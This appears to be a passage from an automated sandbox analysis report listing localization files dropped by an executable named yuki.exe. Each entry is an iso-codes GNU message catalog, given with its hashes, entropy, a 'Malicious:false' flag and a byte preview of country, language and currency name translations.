                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 263 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12693
                                                                                                    Entropy (8bit):4.861156939698069
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:SkPmheTYqVxSKdkpfuNF6C/WwAhunO0Jboaf/+7/K:SpheDLKcTWwACUA+7/K
                                                                                                    MD5:8F4D81D68B9BBD920CC2C48C68336EFE
                                                                                                    SHA1:4A66923FB7839B9F3381D1846D712AC7183A7114
                                                                                                    SHA-256:53F7738BA312920686A6722597D12CAD99961116DC05DFD9FD8D1EC60C52FE56
                                                                                                    SHA-512:D58460E25FFCC5DB03DDF5A4C334ED31B68CDF80644F3E73C5AE751BB7A54AAB8FA69EACFE8962228870B984329C68BDC87A78ED1B056DF362FE3B58ACA05AE1
                                                                                                    Malicious:false
                                                                                                    Preview:................T...a...................................%.......-.......<.......D.......K.......T......._.......s.......}................................................................................................................................... ...........4.......K.......T.......b.......i...............................................................................................................!.......2.......J.......S.......o.......w.......}...............................................................................................................................%...............J...'...X.......................................................................................................$.......,.......2.......<.......C.......M.......U.......`.......e.......o.......v...................!...........................................................................................................$.......+.......6.......<.......O.......b.......u.......~.......................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Netherlands Antilles'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):473
                                                                                                    Entropy (8bit):5.183081742581575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilVWwCuHNNGYxA9Ct0vOuvP0NXzffAQ//R/ApMiZL2AFrwNsXmBQ8KMW0YEiRqAc:icK1xjt02Uk4w/apDLL0NsXmBQWiRap
                                                                                                    MD5:89B5900B10EF8D12C5D6E398BB1DD145
                                                                                                    SHA1:AE792265383DAE51E365277C0E6810AA5C38AB49
                                                                                                    SHA-256:AEA1607A0D9ABA52D70EACFA277A246E3B3A2B880796BFEFE624E60CD5876F0D
                                                                                                    SHA-512:DF52D654233A45F3484D0BA5EBB496D6EF605A3854DEAB90DD2C8B49E21C0DC455F3E85FA0D81BF99196EB8DAA6CE46F560227FD61731FB4B682250F38CAFCC6
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...]...f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2008-07-17 03:56+0200.Last-Translator: Nicholas Ng <nbliang@gmail.com>.Language-Team: Malay.Language: ms.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: Pootle 1.1.0..Netherlands Antilles.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 50 messages, Project-Id-Version: iso_639-3 'Afrikaans'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2386
                                                                                                    Entropy (8bit):4.697851639574682
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:dSgrBBjqXz3q1kECU2S5wd4z+MUZ4Fd+L6jbnI24zA:Nraj3q1RGE+Mpd+L6zEA
                                                                                                    MD5:E2DEF7191B79047422412B6AC80075F2
                                                                                                    SHA1:F1E49E0EE10A08E9823208E00DCB7310983ECE13
                                                                                                    SHA-256:90478F4085B303ACADEE3DD356E88861D22866E68D3390B806721FF908528F3A
                                                                                                    SHA-512:6CDF9C5A32CE7A9164F46BB803E78AB6CE40330867394E5091D0DBC58082EB6EEAABBB7DC00C1BFBB20369E9EE2A831EAF5F7328CDAFFA4E54516ABFB1431CE9
                                                                                                    Malicious:false
                                                                                                    Preview:........2...........C...<.......H.......I.......S.......\.......c.......o.......v.......................................................................................................................................................................#.......+.......4.......;.......C.......N.......Y.......^.......d.......n.......u....................................................................................................................................................................................................... .......&.......-.......3.......;.......E.......N.......W......._.......f.......m.......t.......~...............................................................................................................................................................#.......+.......0.......8.......@.......G.......(.......0...........)...........2.......,................................... ...*..."...............$...........-...............................+.........../...........
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 206 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9641
                                                                                                    Entropy (8bit):4.880596319592922
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:evWKC+6MkA1ln6iTocizMg0gYlrBUaNZETW2Wq:eeKy3A1ln6ikcaMgVYlrB54TlWq
                                                                                                    MD5:4CC793CE6402D87718FD9CFBA7B63E5B
                                                                                                    SHA1:28D7CAD41365A1731CDD089AA4B504DCF7093F27
                                                                                                    SHA-256:3A132A5B770937D04D5FEF1021490D8EDE93902A475FB91808AAA0F59C06722C
                                                                                                    SHA-512:1186EB18FBB0395512B75569BFF302A91FB6D643C78CF63AEED76304777A0431D6D900FF83E54E869A80A9537D9F49D59B81085770387FAD353641BF7A8C81EA
                                                                                                    Malicious:false
                                                                                                    Preview:................................P.......Q.......].......e.......m.......|...............................................................................................................................................!.......(.......0.......G.......P.......^.......e.......................................................................................................................4.......<.......B.......O.......Z.......b.......g.......n.......}...............................................................................................................!.......(.......6.......G.......c.......i.......q.......y...........................................................................................!...........................................#.......).......3.......8.......@.......L.......S.......Y......._.......f.......q.......w.......................................................................................................................................................%.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):402
                                                                                                    Entropy (8bit):5.2062627338648655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijZ1YYxA9Ct0vOuvP0NXzffs3k/RRNztXw7AFRdes3XmBQ8KMW0YEi9:i4Z1xxjt02Ukuk/DNzlLnNXmBQWi9
                                                                                                    MD5:463A43FF81A7EE2758BA934821597F7A
                                                                                                    SHA1:B5703BF718BB93A643D16C6E2B1BBB961EB02CFD
                                                                                                    SHA-256:C1C0F1226C3D086BCB1AC54B2F7BCD2452CC6F2CB98728390C7500FDFFA3CA29
                                                                                                    SHA-512:F5E36275266B1A6116B09D9DA98AF68148463BD43A2202C437F72547E9EE2715F4B78C9EF9F010723B6925B74D745575DD642307AE533D125EDAE07C85C645BF
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...X...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-01-05 16:40+0000.Last-Translator: Ramon Casha <ramon.casha@linux.org.mt>.Language-Team: Maltese <mt@li.org>.Language: mt.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 240 messages, Project-Id-Version: iso_639-3 'Akoli'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9694
                                                                                                    Entropy (8bit):4.7337138095065106
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:BxsSVC/ajMspqbj4EiUpV7PFo9el5qkrD6LeRAu2e:TsJaIsoI6Fo9el5fa6R3f
                                                                                                    MD5:7E9D6B375A571BEF59F2FC97843EEB0B
                                                                                                    SHA1:AD740C9BE2D915D6D509EEAE0DFBE5F124D2F854
                                                                                                    SHA-256:2B22DE179E800616351844BB14FCBD08D601A409796DB6E61528BD708E927B18
                                                                                                    SHA-512:079C3D89972335C67B3C56C9E3E87F446411844F5F8AE52CA85805BC1503071BC030E8088AF1386C77635F32DF607B5DFE95EA6EBAC573BDECB33AC9DA7F28E0
                                                                                                    Malicious:false
                                                                                                    Preview:....................K...........H.......I.......O.......W.......\.......e.......o.......u.......|.......................................................................................................................................................................!.......'......./.......7.......@.......I.......R.......[.......c.......k.......u.......}.......................................................................................................................................................#.......-.......6.......:.......A.......I.......P.......X.......\.......c.......i.......l.......r.......w.......~.......................................................................................................................................................................+.......5.......=.......C.......\.......p.......x...............................................................................................................................................................".......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 185 messages, Project-Id-Version: iso_3166-1 '\341\200\241\341\200\254\341\200\226\341\200\202\341\200\224\341\200\272\341\200\224\341\200\205\341\200\271\341\200\205\341\200\220\341\200\224\341\200\272\341\200\224\341\200\255\341\200\257\341\200\204\341\200\272\341\200\204\341\200\266'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15588
                                                                                                    Entropy (8bit):4.539454513619587
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:tWB1kpMvpdBc4gTmghc3/9+f7d8nxby4nINHuH4dJVWw:S1kmRd/gTcwiw
                                                                                                    MD5:A1E7E63477F8BED25BE4B5EB44F8E034
                                                                                                    SHA1:0D5FE2E7530A2C6CCA770EB70A8224F41AB21518
                                                                                                    SHA-256:5D185E895028265805A657DB557AF88EA9988C77DACE40F11F13DBAF6EADCC64
                                                                                                    SHA-512:65B869C907509587E94F2AE21F23527A5F0821CD9401256244511DBF9C90531FC23C1546FBC982C422A786738EB4FE6283CBF41EE6BD24A9EA9DED2FD24C7521
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................................................#.......+.......3.......:.......@.......G.......O.......f.......o.......v.......................................................................................................................!.......&......./.......6.......E.......M.......V......._.......r.......z.......................................................................................................................................!.......,.......1.......;.......B.......P.......W.......].......f.......p.......x...............................................................................................................................................................................(.......3.......>.......E.......N.......W.......\.......b.......m.......w.......~...............................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 151 messages, Project-Id-Version: iso_3166-1 'Apeganitan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6574
                                                                                                    Entropy (8bit):4.657906444671493
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6d0NF8CSMPa4AEEW6pDJONqaBy77wiHzhuaIA:66NqCSM5nEW6pDJONhBy77wiHduaIA
                                                                                                    MD5:7924CD14BBA0EA1CA87683C7447533F1
                                                                                                    SHA1:62D2E67D0B72194034BD7835F0426F2C4AB485A2
                                                                                                    SHA-256:A07834CDD2B75061BAA27F7D373AEF4E958B3680B60B698AFD3294E1C4EDB74E
                                                                                                    SHA-512:3A10710ABAF2AD4819C6B3997AFD53128F7D40EF9A153257FA17C2FD366C7B1FCE4354A1832C0F6B6756299449B27719F318EDFCDBD17D036186F24C96A928AB
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................".......*.......0.......:.......B.......M.......U.......`.......i.......q.......y...............................................................................................................................................(.......0.......;.......C.......H.......O.......^.......f.......o.......x.......................................................................................................................................&.......0.......7.......E.......L.......R.......[.......c.......k.......q.......{...............................................................................................................................................................".......(......./.......7.......>.......G.......R.......Z.......b.......h.......n.......z...............................................................................................................................!.......'.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 182 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8116
                                                                                                    Entropy (8bit):4.761532239698981
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:34LSVuJnYxZaobrNUxbagTqbh8ZE3OQVV:34e4eLa2rSOgTqbh8237V
                                                                                                    MD5:0DF0ACCC8ABE649839AD615ED4C5DDEE
                                                                                                    SHA1:A8E16C00BEF5D39F09D619DF7C65FD0281BEE6D7
                                                                                                    SHA-256:33CDC8437D875DAD79D2737946ACAE98136404ED2F26B8266BC0091D4FBE1BB6
                                                                                                    SHA-512:3C151A0B6F94992F7FB632E4C71C040E1FD2DF14EAAB0ED071D761ECB0DB9D6D2914E98AC5F7CE80D9908BAA4F85A1F9CA9BEACCD0A171CCA46946E527B1B839
                                                                                                    Malicious:false
                                                                                                    Preview:........................|.......h.......i.......u.......}.......................................................................................................................................................6.......?.......F.......O.......\.......d.......m.......v.......}.......................................................................................................................................'.......9.......A.......J.......i.......n.......v.......}............................................................................................................................................................... .......(......./.......5.......=.......C.......J.......U.......[.......d.......k.......v.......}.......................................................................................................................................................!.......,.......4.......?.......G.......O.......U.......[.......g.......s.......}...............................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 85 messages, Project-Id-Version: iso_15924 'arabisk'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4069
                                                                                                    Entropy (8bit):4.757440790502466
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YNgEZWFzCJbO8NqWc3JlkIfwbFVDem8mFt:oWRYxqWakIUVDemTt
                                                                                                    MD5:C4D91C722AA046C4B3D3439635BE74F2
                                                                                                    SHA1:9DEE3DBBCEF1E3F93F840683C3DC71A8EE0E72E5
                                                                                                    SHA-256:644874198E5F41EB0D45E774C967A5E7C26653E715AFB5A211679854FA1108A7
                                                                                                    SHA-512:747845620970A6393AC4CEFE0A417C4D9529F3177A58CB79E385FB75F1D9DCBE8D30E0E4EBA5A0C94D98DABF2FF07AC010F2D3192AE629E093BF5D48046DB2F6
                                                                                                    Malicious:false
                                                                                                    Preview:........U...........q...l.......0.......1.......8.......A.......I.......R.......X.......`.......l.......u.......|.......................................................................................................".......+.......<.......N.......c.......n.......u.......{.......................................................................................................................................................!.......3.......=.......I.......P.......V.......a.......m.......s.......{...............................................................................................................................!.......'...............6.......=.......B.......J...%...S.......y.......}.......................p.......x...............................................................................................................................................8.......U.......].......h.......r...............................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23547
                                                                                                    Entropy (8bit):5.01398047589987
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosOvD0pnaGeSucY46nbjz5wsWP48WAINiZGAOB9ikediAG1n9:0oF6na1SucY48fmsWP48WAIDgkediAc9
                                                                                                    MD5:61E7011E5DE285373A18EE39FE037C23
                                                                                                    SHA1:2D243146BA3AFA6F3CA873EF3D9FD1465E423729
                                                                                                    SHA-256:02B9F7667DE319EC22A2057FFE7246AC78C8212D383358F7EDA9FC08974FC11F
                                                                                                    SHA-512:B9D79457536F1C103AA7198DFCAA2A15C5EF666C6524605107ED0F498FC53649BF2E816CE160A8FC17ACE31DAEB9DFB275B0E61198A5171E7358BAD6363D648C
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 20 messages, Project-Id-Version: iso_3166-2 'S\303\266dra Karelen'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1305
                                                                                                    Entropy (8bit):4.965900955881278
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:FBXl2Vi3OigtIt7GlEqP0o0hXPXSt0UBixvCmYIXmyAuT5fe0PcmkgFl:spiOEE07hX/UJhpy1Je4cmJf
                                                                                                    MD5:63259039EEF2E167502F7CC77F25CC59
                                                                                                    SHA1:1ED315350C3C4D840D09029EFBCCB5F045965515
                                                                                                    SHA-256:47F6877518E3880ECF2023B6ABAF7EC73934C6D43667FF774D592D20C1DAEDB3
                                                                                                    SHA-512:F34B46F27D6E4BBB95921C0A07A2973BB2169F17B1516199CD524E160DD828FE43AA5EEE9A33AB5A3CCF9285BF10B75C09BF2727397D467430004EBE4EEB3733
                                                                                                    Malicious:false
                                                                                                    Preview:........................\............................................................... .......,.......8.......J.......P.......Z.......d.......t...........................................=...........................%.......4.......?.......T.......k.......}................................................................................................................................................................................................................Etel.-Karjala.Etel.-Pohjanmaa.Etel.-Savo.Kainuu.Kanta-H.me.Keski-Pohjanmaa.Keski-Suomi.Kymenlaakso.Landskapet .land.Lappi.Pirkanmaa.Pohjanmaa.Pohjois-Karjala.Pohjois-Pohjanmaa.Pohjois-Savo.P.ij.t-H.me.Satakunta.Uusimaa.Varsinais-Suomi.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: nb_NO.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Britisk Antarktis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2838
                                                                                                    Entropy (8bit):5.20952424100027
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3liU9V+vGqIfdvqN5CoU3RIJBwS3+0KlWzmE0y2HZk:rLvEGV+yaCowIfwS+07B0Jk
                                                                                                    MD5:1591E03C5126728FDB0DF1E6D13C4995
                                                                                                    SHA1:7FC0E8A1BEE8DBE24BB41AFFF805A2FCE65CE337
                                                                                                    SHA-256:FA8F74A3429ABA1928C88310E8DB953100AE45AC748C2D4758B973C4EE61098B
                                                                                                    SHA-512:E137876103AAB3379E4FDA8BE764DED5763928264B70A52BCE210074CB206E2BCA145B0C3DAB44104A67EF96E4ED74D43C8048A0573EC27B6A04040118B1651E
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................".......4...........?...=...Y................................................... ...........;.......T.......a.......n...................&...............................................0...'.......X...$...q...........3............................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 155 messages, Project-Id-Version: iso_4217 'ADB-regneenhet'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8569
                                                                                                    Entropy (8bit):4.863846403406804
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fr+Y9DzGVF5LlglvJbGEABynC0dIJJRLDfct3oDWaO:CHP0g3B4VALGoKx
                                                                                                    MD5:A494EA0256912BCD7A4A9CE5E2D295E5
                                                                                                    SHA1:4411228B185D80BA5A15B01E3F1DB4FB131B12E7
                                                                                                    SHA-256:5F20C1D7588163B1D8670D213E7B4C68412C3E2A66E9196AF9F2BD1DEF9A382E
                                                                                                    SHA-512:16EED9E2EB983FD17B6EAD3952A8EF2B9DBFD7F9D7B6212739A79A32A5E7E9299F8B7C13AAD6D5AB61565ED64A5387C11CF4C8BB19A5C91306D31CE83781DCBC
                                                                                                    Malicious:false
                                                                                                    Preview:................................................-.......5.......D.......S.......a.......s.......................................................................................................!.......1.......@.......J.......Z.......p...0...}...............................................................................(...............=.......C.......R.......W.......m.......|...............................................................................................................".......0.......=.......J.......V.......f.......v.......................................................................................................................................................;.......H.......X.......k.......q.......w.......................................................................................,.......6.......=.......N.......\.......l.......u...............................................................................................................................'.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 134 messages, Project-Id-Version: iso_639-3 'afar'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5570
                                                                                                    Entropy (8bit):4.603296312370474
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2taRDau5mBBoRsl4L/rglgTHe5BZQx9GifTrOhM5w+LKoUuDb2aaKb:COauAbK/rg2DYy93rOSsoUuVaKb
                                                                                                    MD5:B193382218EE559BF4DD86843725C46C
                                                                                                    SHA1:AFBB1CD1845BDFCA1EE8241B736CE4E289E2CE15
                                                                                                    SHA-256:97A8E212B4DB60727800571F7A79A53EAF7042D0DCCB53EF03549122D772CCA8
                                                                                                    SHA-512:744D9F67874BE943CCFA9F4C8BC79B463586DE5483FAAB7C0B8D8DD21966CAFEA9F20F21F6B06AE529FFA8001841602A893DB1A15A14B29FA8D82FC1B437A350
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......H.......I.......N.......X......._.......i.......r.......{...............................................................................................................................................................".......*.......3.......9.......@.......E.......K.......T.......^.......g.......k.......s.......z...............................................................................................................................................................................%.......,.......8.......@.......E.......K.......R.......[......._.......d.......l.......t...............................................................................................................................................................$.......+.......1.......:.......B.......I.......P.......W.......a.......h.......x.......................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 13 messages, Project-Id-Version: iso_639-5 'Afroasiatiske spr\303\245k'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1237
                                                                                                    Entropy (8bit):5.201281432371167
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:VgwZuQySHf68648wqJXTt0UziFrww/RXmGIHX4PBsoustxsj7KXNa:awu1CUCrww0VHXyBsoustxsHKXNa
                                                                                                    MD5:D5DA3F4153AE2BF8FB67F33A2DA907B6
                                                                                                    SHA1:E150CE64A278DFCC2F70146987FFEE9D496C686A
                                                                                                    SHA-256:6E2756CDA141B11A0EBF639687FA656E1673D343265191EE06C19F7995350535
                                                                                                    SHA-512:98E060E0DD5E3A8FBBF3B16C080C210E002CFA1E4291E1901B1455AB01122F17E06D224EB11998CD8A3CB42FB7CE1DDA18EF3A299BC306E14D976F2E00C4334D
                                                                                                    Malicious:false
                                                                                                    Preview:................................0.......1.......H.......].......r...........................................!...........................-...............#.......6.......B.......Y.......i.......u................................................................................................................Afro-Asiatic languages.Algonquian languages.Athapascan languages.Austro-Asiatic languages.Baltic languages.Bantu languages.Berber languages.Bihari languages.Caucasian languages.Central American Indian languages.Chibchan languages.Uto-Aztecan languages.Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2019-05-17 01:48+0000.Last-Translator: Allan Nordh.y <epost@anotheragency.no>.Language-Team: Norwegian Bokm.l <https://hosted.weblate.org/projects/iso-codes/iso-639-5/nb_NO/>.Language: nb_NO.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 400 messages, Project-Id-Version: ne_merge '\340\244\205\340\244\253\340\244\227\340\244\276\340\244\250\340\244\277\340\244\270\340\245\215\340\244\244\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32389
                                                                                                    Entropy (8bit):4.997293147170928
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:1kZU7qMKB+x8wtj18jq5wsOP4XJOAjgiZj2PCY7L7pB0xesq3pRm8d9Ze:1CgPta+msOP4XJOAjkCy0IsqfmYe
                                                                                                    MD5:FE5465BA01A5BBD5C6F6397729EFB21D
                                                                                                    SHA1:7A618DA867429B40CC509D516E9103096802619A
                                                                                                    SHA-256:2AA61E21EF7DCB7130F401ECF11BE96007649A0C44B30B6E51A92746D7034ADE
                                                                                                    SHA-512:545CAE858E58A72F49FCC724B58624F8ECAD71DB2D7B1EAD8E76638475E7ECA1B32350F628ECA7B02879DDBCDFAF1FCFA5DDFEF4432CCDDE08F5A9E08FE86B76
                                                                                                    Malicious:false
                                                                                                    Preview:.................................!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......'"....../"......5"......?"......G"......R"......Z"......b"......m"......v"......~".......".......".......".......".. ....".......".......".. ....".......#......##......,#......:#......A#......`#......w#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......"$......+$......D$..,...`$.......$.......$..%....$.......$.......$.......$.......$.......$.......$.......$.......%..%....%..,...:%.."...g%..*....%.......%.......%.......%.......%.......%.......%.......&.......&.......&......*&......2&......:&......C&......_&..'...m&..$....&.......&.......&.......&.......'....../'......4'......<'......C'......Q'......b'......r'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(......#(......*(......8(......?(......E(..!...a(.......(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: ne_merge '\340\244\254\340\245\215\340\244\260\340\244\277\340\244\237\340\244\277\340\244\266 \340\244\206\340\244\250\340\245\215\340\244\237\340\244\276\340\244\260\340\244\237\340\244\277\340\244\225 \340\244\225\340\245\215\340\244\267\340\245\207\340\244\244\340\245\215\340\244\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3799
                                                                                                    Entropy (8bit):5.195253311731869
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDmYwhQyB0F9i+Cf0GkgcRgTwqMuPhb0Bfbhwkcc+qc:qDmYw2jCsVmz
                                                                                                    MD5:C482B547ECD92E4033724504500CFE3C
                                                                                                    SHA1:6C9956A409FCBC27E698AEB670339C8B9649ED90
                                                                                                    SHA-256:AD18C43CD9EEDD8F96FD5A0BCE629CEF60A7A8B872C454315AD6CF26E32BBE85
                                                                                                    SHA-512:3099CDFC30FC04E3B3D146A51D0B70421CC84697A239B8CB8808667C72F33BEFBFDEDC90AE22EEF1F8D45F8E5CF2619CF296B892CF4CDF14E810C8160CAA4C9F
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................G...Q...>.......x.......Q...Q...............4...2...G..."...z...;.......6.......g.......Q...x...?...............(...*...7...S...%.......+.......+.......2.......8...<.......u...1.......F.......n.......B...s...Z...................#..."............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10224
                                                                                                    Entropy (8bit):5.05098865103854
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dk2oSFKyDiwy+AMltU4WjV9qWxa5hW8/IVjPm2i4OcgPIyWPgD:NvFTNg4WjVDxa5hW8/ItWrcM2PgD
                                                                                                    MD5:1CE08FCA7AEAC545F44813A3082A4859
                                                                                                    SHA1:C8E5AD5DAE3AF73852EACE64516568714AAEBF08
                                                                                                    SHA-256:6BDEFDF5C0E9E364B8431B53F287E192F6115C587D927E6D503F4FFB60F97CAC
                                                                                                    SHA-512:C57A4A1B97A2E413DCDB8D1A0280AA9C7D5577AB6C9BA1A5E565E84930593463EF0DFD5534864DE21FD4993F08443258E08F0EEBA28120B2580231236D7DAE18
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23512
                                                                                                    Entropy (8bit):5.018399017928312
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSos4tTRe4txP0A+qUB46nbjz5wsWP48WAINiZGy9fGlZoAZp8:0o9TRe4txzjm48fmsWP48WAI8O6AZy
                                                                                                    MD5:1ACE1A26FDB4FA88F6966082E3B37FA8
                                                                                                    SHA1:504FFBCC401239A01DDD7A1BE5696206F2FEB3C3
                                                                                                    SHA-256:B0F5DF85AA5DE79CD87B9EDB4DB887B8861D894934C4722FB46F28410A2D4A59
                                                                                                    SHA-512:0C24E583AE4E9F22D2BC9E8A4AEE157AE7FA707648EA56DBBB4AC2DD98291B56B7E3323C50EE1DC13C905EF62212322842872535CA632A57E059B392BAA5B397
                                                                                                    Malicious:false
